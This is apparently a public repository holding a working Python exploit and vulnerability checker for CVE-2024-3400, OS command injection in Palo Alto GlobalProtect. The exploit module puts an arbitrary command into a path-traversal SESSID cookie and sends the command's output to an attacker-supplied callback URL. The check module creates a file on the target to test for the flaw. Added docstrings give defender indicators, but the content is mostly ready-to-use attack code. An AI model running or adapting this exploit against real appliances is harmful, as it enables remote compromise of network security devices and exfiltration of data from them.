├── README.md └── exploit.py /README.md: -------------------------------------------------------------------------------- 1 | # cve-2024-3400 2 | Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation 3 | 4 | ```bash 5 | usage: cve-2024-3400.py [-h] {exploit,check} ... 6 | 7 | CVE-2024-3400 - Palo Alto OS Command Injection 8 | 9 | positional arguments: 10 | {exploit,check} Available modules 11 | exploit Exploit module of script 12 | check Vulnerability check module of script 13 | 14 | options: 15 | -h, --help show this help message and exit 16 | ``` 17 | 18 | # Disclaimer 19 | Use at your own risk. This was created for educational purposes only. The author is not liable for any action performed by a third-party or how this script may be used. 20 | -------------------------------------------------------------------------------- /exploit.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3
# Author: Kr0ff

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

def check_vuln(target: str, file: str) -> bool:
    """Probe *target* for CVE-2024-3400 and return True when it looks vulnerable.

    What the code does: POSTs to ``/ssl-vpn/hipreport.esp`` with a SESSID cookie
    whose value is a ``../`` path-traversal string ending in *file*, then GETs
    ``/global-protect/portal/images/<file>`` and treats an HTTP 403 on that
    second request as the "file now exists" signal.

    Args:
        target: Host or URL of the appliance; ``http://`` is prepended unless
            the string already contains ``https://`` (see the branch below).
        file: Filename appended to the traversal path in the cookie.

    Returns:
        True only when the POST returned 200 and the follow-up GET returned
        403; False otherwise. ``sys.exit(1)`` is called if both the HTTP and
        the HTTPS POST time out.

    Defender notes (grounded in the requests built here): the detectable
    artifacts are a SESSID cookie containing ``../`` sequences on requests to
    ``/ssl-vpn/hipreport.esp`` and unexpected files appearing under the
    portal images directory. ``verify=False`` disables TLS certificate
    validation for every request this function makes.
    """
    ret = False

    uri = "/ssl-vpn/hipreport.esp"

    s = requests.Session()
    r = ""

    headers = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        # Path traversal carried in the session cookie; this header is the
        # primary network-level indicator for this check.
        "Cookie": \
            f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    }

    # Second request deliberately omits the cookie so only the file's
    # presence is being tested.
    headers_noCookie = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }

    # Parses as `(not "http://") or (not ("https://" in target))`; the first
    # operand is always False, so this branch is taken whenever *target* does
    # not contain "https://".
    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            # verify=False: certificate validation is off for this call.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # `A or B` in an except clause evaluates to A, so only
        # requests.exceptions.Timeout is caught here.
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

            print("Trying with \"HTTPS\"...")

            # Retry URL is built by prefixing the current *target* string.
            target = "https://" + target
            try:
                r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
            except requests.exceptions.Timeout or requests.ConnectionError as e:
                print(f"Request timed out for \"HTTPS\"")
                sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if r.status_code == 200:
        # A 403 on the images path is interpreted as "the file was created".
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret



def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    """Send the CVE-2024-3400 command-injection request and report the response.

    What the code does: POSTs to ``/ssl-vpn/hipreport.esp`` with a SESSID
    cookie combining a ``../`` traversal path and a backtick-quoted segment
    that embeds *callback_url* and ``$({payload})``. The return value only
    reflects whether the literal text ``Success`` appears in the HTTP
    response body; any out-of-band result is expected at *callback_url*
    (presumably an OAST listener per the CLI help — not verified here).

    Args:
        target: Host or URL of the appliance (same prefixing rule as
            ``check_vuln``).
        callback_url: URL embedded in the cookie value.
        payload: Command string embedded verbatim in the cookie value.

    Returns:
        True when ``"Success"`` is in the response text, else False.
        ``sys.exit(1)`` is called if both the HTTP and HTTPS POST time out.

    Defender notes: the same SESSID cookie with ``../`` plus backtick
    characters is the network artifact; the traversal path points under
    ``/opt/panlogs/tmp/device_telemetry/minute/``.
    """
    ret = False
    p = ""

    # `p` is assigned here but never read afterwards; *payload* is sent as
    # given.
    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    headers = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        # Traversal path plus backtick-quoted command substitution in the
        # session cookie — the key indicator for this request.
        "Cookie": \
            f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"

    }

    s = requests.Session()
    r = ""

    # Same always-true-unless-"https://" condition as in check_vuln.
    if not "http://" or not "https://" in target:
        target = "http://" + target
        try:
            # verify=False: certificate validation is off for this call.
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        # Only requests.exceptions.Timeout is caught (`A or B` -> A).
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

            print("Trying with \"HTTPS\"...")

            # Retry URL is built by prefixing the current *target* string.
            target = "https://" + target
            try:
                r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
            except requests.exceptions.Timeout or requests.ConnectionError as e:
                print(f"Request timed out for \"HTTPS\"")
                sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    # Success is judged solely on the response body text.
    if not "Success" in r.text:
        return ret

    else:
        ret = True

    return ret

# Initialize the argument parser and dispatch to the selected module.
def argparser(selection: list[str] | None = None) -> None:
    """Parse command-line arguments and run the chosen module.

    Builds an ``exploit`` subcommand (``-t/--target``, ``-p/--payload``,
    ``-c/--callbackurl``) and a ``check`` subcommand (``-t/--target``,
    ``-f/--filename``). Note that ``parse_args`` is called twice: the result
    of the first call (using *selection*) is overwritten by the second, which
    reads ``sys.argv`` and prints help when no arguments were given, so
    *selection* has no effect on the dispatched call.

    Args:
        selection: Argument list passed to the first, discarded, parse.

    Returns:
        None. The return values of ``cmdexec`` / ``check_vuln`` are not
        propagated.
    """
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )

    subparser = parser.add_subparsers( help="Available modules", dest="module")

    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    # First parse result is discarded by the second assignment below.
    args = parser.parse_args(selection)
    # Falls back to "-h" when the process was started with no arguments.
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])

    if args.module == "exploit":
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)

if __name__ == "__main__":
    argparser()
    print("Finished !")